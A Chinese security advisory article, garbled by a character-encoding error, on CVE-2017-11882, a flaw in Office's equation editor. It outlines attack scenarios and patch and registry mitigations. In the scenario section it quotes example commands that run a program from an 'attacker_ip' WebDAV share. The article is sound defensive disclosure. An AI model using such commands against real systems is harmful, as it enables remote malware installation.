當(dāng)人們?nèi)栽谥碧幚?ldquo;沒(méi)有補(bǔ)丁”的微軟MS Office內(nèi)置DDE功能威脅時(shí),有研究人員又發(fā)現(xiàn)了Office的另一個(gè)嚴(yán)重漏洞,攻擊者可以利用該漏洞,無(wú)需受害者用戶交互,遠(yuǎn)程向目標(biāo)系統(tǒng)植入惡意軟件。該漏洞屬于內(nèi)存破壞型漏洞,可影響微軟過(guò)去17年發(fā)布的所有MS Office版本軟件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在內(nèi)的所有微軟Windows操作系統(tǒng)中實(shí)現(xiàn)。
漏洞信息
該漏洞由Embedi公司研究員發(fā)現(xiàn),漏洞可導(dǎo)致遠(yuǎn)程代碼執(zhí)行、未授權(quán)認(rèn)證繞過(guò)、無(wú)需用戶交互的遠(yuǎn)程惡意程序植入。目前漏洞編號(hào)CVE-2017-11882,主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。
由于不正確的內(nèi)存操作,組件EQNEDT32.EXE會(huì)無(wú)法正確處理內(nèi)存中的執(zhí)行對(duì)象,這種破壞條件,致使攻擊者可在當(dāng)前系統(tǒng)登錄用戶環(huán)境下,利用Office遠(yuǎn)程植入惡意代碼或其它惡意程序。
微軟在Microsoft Office 2000中就引入了EQNEDT32.EXE組件,并保留至Microsoft Office 2007之后發(fā)布的所有Office 版本中,以確保新舊軟件的文檔兼容。
該漏洞的成功利用需要受害者用Office打開(kāi)攻擊者特制的惡意文檔,如果與微軟的內(nèi)核提權(quán)漏洞(如CVE-2017-11847)組合利用,攻擊者將會(huì)獲得受害者目標(biāo)系統(tǒng)的完全控制權(quán)。以下視頻是在Windows 7,8,10系統(tǒng)中該漏洞的成功實(shí)現(xiàn)過(guò)程演示:
、
漏洞技術(shù)分析
詳情查看Embedi分析報(bào)告《微軟的難言之隱-你所不知道的漏洞》
可能的攻擊場(chǎng)景
Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場(chǎng)景:
當(dāng)插入一些OLE(對(duì)象鏈接嵌入)實(shí)體時(shí),可能會(huì)觸發(fā)該漏洞,實(shí)現(xiàn)一些惡意命令的執(zhí)行,如向某個(gè)攻擊者架設(shè)網(wǎng)站下載執(zhí)行惡意程序等。
最直接有效的漏洞利用方式就是,訪問(wèn)攻擊者架設(shè)或控制的WebDAV服務(wù)器,并執(zhí)行其中的運(yùn)行程序。
不過(guò),攻擊者還能利用該漏洞執(zhí)行cmd.exe /c start \attacker_ip f類似惡意命令,配合入侵或啟動(dòng)WebClient服務(wù)。
另外,攻擊者還能使用諸如\attacker_ip f.exe的命令向受害者系統(tǒng)中執(zhí)行惡意程序,惡意程序的啟動(dòng)機(jī)制與\live.sysinternals.com ools service方式類似。
緩解和修復(fù)措施
在11月的補(bǔ)丁修復(fù)周期中,微軟針對(duì)該漏洞修改了EQNEDT32.EXE組件的內(nèi)存處理機(jī)制,并發(fā)布了多個(gè)漏洞補(bǔ)丁更新,強(qiáng)烈建議用戶及時(shí)進(jìn)行下載更新。
鑒于EQNEDT32.EXE組件的不確定隱患,我們建議用戶通過(guò)以下注冊(cè)表命令來(lái)對(duì)其進(jìn)行禁用:
reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400
如果在64位操作系統(tǒng)中安裝了32位的MS Office軟件,命令如下:
reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400